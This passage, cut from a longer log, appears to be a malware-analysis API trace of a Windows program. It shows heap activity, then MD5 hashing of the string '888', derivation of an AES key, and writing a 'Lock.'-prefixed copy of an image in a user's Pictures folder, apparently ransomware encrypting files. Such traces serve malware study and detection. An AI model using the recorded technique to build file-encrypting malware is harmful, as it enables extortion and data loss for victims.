(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0209.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.026] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.026] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0209.026] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.026] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.027] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0209.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0209.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.028] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0209.028] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0209.028] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.028] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.028] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.029] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7be68) returned 1 [0209.029] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0209.029] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0209.030] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.030] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.030] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0209.030] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0209.030] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.030] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.030] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.030] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.030] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.030] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.030] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.030] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.030] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.030] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab140, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0209.030] CryptCreateHash (in: hProv=0xa7be68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0209.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.031] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.031] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.031] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0209.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0209.031] CryptHashData (hHash=0x9e1eb8, pbData=0x2a71a18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.031] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.031] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.031] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.031] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab248, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.031] CryptDeriveKey (in: hProv=0xa7be68, Algid=0x6601, hBaseData=0x9e1eb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0209.031] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.031] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7220, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.033] CryptDestroyHash (hHash=0x9e1eb8) returned 1 [0209.033] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/aJ_Kkru.png" (normalized: "c:\\users\\fd1hvy\\pictures\\aj_kkru.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0209.034] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.034] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0209.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0209.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0209.035] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74100 [0209.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.035] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0209.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74100 | out: hHeap=0x2af0000) returned 1 [0209.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0209.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0209.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.036] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.aJ_Kkru.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.aj_kkru.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0209.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0209.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0209.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0209.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0209.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.037] RtlAllocateHeap 